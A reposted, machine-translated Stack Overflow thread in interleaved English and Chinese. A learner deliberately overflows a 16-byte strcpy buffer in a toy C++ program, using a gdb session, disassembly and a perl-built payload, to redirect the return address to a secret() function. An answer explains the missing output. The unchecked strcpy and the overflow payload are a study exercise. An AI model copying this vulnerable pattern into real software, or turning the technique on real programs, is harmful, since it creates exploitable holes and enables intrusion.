C ++中的故意缓冲区溢出
[英]Intentional Buffer overflow in c++
问题描述
I'm pretty sure I'm doing this correct, I've followed many tutorials but can't get this example to work for me.
我很确定我这样做是正确的,我已经学习了很多教程,但无法让这个例子对我有用。 My goal is to call 'secret'我的目标是称之为“秘密”
So I have this c++ program:所以我有这个 C++ 程序:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
void secret() {
printf( "You Won!");
}
int check(char *name) {
char buffer[16];
strcpy( buffer, name );
printf( "Your name is: %s \n", buffer);
srand(time(NULL));
return rand();
}
int main(int argc, char **argv) {
int randnum;
randnum = check(argv[1]);
if(randnum < 5) {
secret();
} else {
return( 0 );
}
return( 0 );
}
I then feed it into gdb and I run it, overflowing the buffer until I get:然后我将它输入 gdb 并运行它,溢出缓冲区直到我得到:
(gdb) run AAAABBBBAAAABBBBAAAABBBBAAAACCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: ... AAAABBBBAAAABBBBAAAABBBBAAAACCCC
Your name is: AAAABBBBAAAABBBBAAAABBBBAAAACCCC
The buffer address is [0xffffd960].
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
So CCCC is the return address.所以CCCC就是返回地址。 So in gdb I run 'disas main' returning:所以在gdb我运行'disas main'返回:
0x08048524 <+0>: lea 0x4(%esp),%ecx
0x08048528 <+4>: and $0xfffffff0,%esp
0x0804852b <+7>: pushl -0x4(%ecx)
0x0804852e <+10>: push %ebp
0x0804852f <+11>: mov %esp,%ebp
0x08048531 <+13>: push %ecx
0x08048532 <+14>: sub $0x14,%esp
0x08048535 <+17>: mov %ecx,%eax
0x08048537 <+19>: mov 0x4(%eax),%eax
0x0804853a <+22>: add $0x4,%eax
0x0804853d <+25>: mov (%eax),%eax
0x0804853f <+27>: sub $0xc,%esp
0x08048542 <+30>: push %eax
0x08048543 <+31>: call 0x80484c4 <check(char*)>
0x08048548 <+36>: add $0x10,%esp
0x0804854b <+39>: mov %eax,-0xc(%ebp)
0x0804854e <+42>: cmpl $0x4,-0xc(%ebp)
0x08048552 <+46>: jg 0x8048560 <main(int, char**)+60>
0x08048554 <+48>: call 0x80484ab <secret()>
0x08048559 <+53>: mov $0x0,%eax
0x0804855e <+58>: jmp 0x8048565 <main(int, char**)+65>
0x08048560 <+60>: mov $0x0,%eax
0x08048565 <+65>: mov -0x4(%ebp),%ecx
0x08048568 <+68>: leave
0x08048569 <+69>: lea -0x4(%ecx),%esp
0x0804856c <+72>: ret
So I try the input : (gdb) run $(perl -e 'print "A"x28 . "\\xab\\x84\\x04\\x08"x1')所以我尝试输入: (gdb) run $(perl -e 'print "A"x28 . "\\xab\\x84\\x04\\x08"x1')
and I get:我得到:
Program received signal SIGSEGV, Segmentation fault.程序收到信号 SIGSEGV,分段错误。 0xffffdb00 in ?? 0xffffdb00 在 ?? () ()
Why isn't this working?为什么这不起作用? Is it possible to overflow the condition to becomming true?是否有可能使条件溢出成为真?
1 个解决方案
解决方案1
0 2015-09-29 07:36:07
Edit: I assume you are learning about security and experimenting with buffer overflows.编辑:我假设您正在学习安全性并尝试缓冲区溢出。 You may want to clarify for others that you are not trying to write programs like that.您可能想向其他人澄清您不是在尝试编写这样的程序。
The way you are doing seems correct, I think the secret function is called but the program crashes when it returns from it.你这样做的方式似乎是正确的,我认为调用了secret函数,但程序从它返回时崩溃了。 The "You Won!" "You Won!" text is not printed out because it wasn't flushed from some buffer.文本没有打印出来,因为它没有从某个缓冲区中刷新。 You can try to put breakpoint on the secret function and you should see that it is being called.您可以尝试在secret函数上放置断点,您应该会看到它正在被调用。 You can also add new line \\n at the end of the string to help flush it out before the program dies.您还可以在字符串末尾添加新行\\n以帮助在程序终止之前将其刷新。
If you would like to let the secret happen and then quit the program correctly, it would require more sophisticated input data.如果您想让secret发生然后正确退出程序,则需要更复杂的输入数据。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.